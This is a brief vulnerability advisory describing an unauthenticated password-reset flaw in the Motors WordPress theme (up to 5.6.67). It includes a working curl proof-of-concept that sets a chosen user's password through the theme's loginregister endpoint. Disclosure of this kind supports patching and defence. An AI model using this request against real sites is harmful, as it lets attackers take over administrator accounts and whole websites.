
Motors <= 5.6.67 - Unauthenticated Privilege Escalation via Password Update/Account Takeover
The Motors WordPress theme (up to and including version 5.6.67) contains a critical authentication flaw in its password reset functionality.
It provides a front-end password update mechanism via endpoints, but fails to properly validate user identity or authorization before processing password changes.
As a result, unauthenticated attackers can send crafted HTTP requests that supply a user_id, an arbitrary hash_check, and a new password (stm_new_password) to reset any user’s password — including administrators.
If exploited, this allows attackers to:
Gain administrative access,
Take over the entire site,
Deploy persistent backdoors or malicious plugins.
This flaw is especially dangerous because it requires no login, and often leaves no obvious trace unless logs are monitored.
curl "https://local.ization/loginregister/?user_id=2&hash_check=%C0" --data "stm_new_password=randomizer" -XPOST -v -H 'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Mobile Safari/537.36'
This report is for educational and authorized security testing purposes only.
Exploitation of this vulnerability without permission may violate legal and ethical boundaries.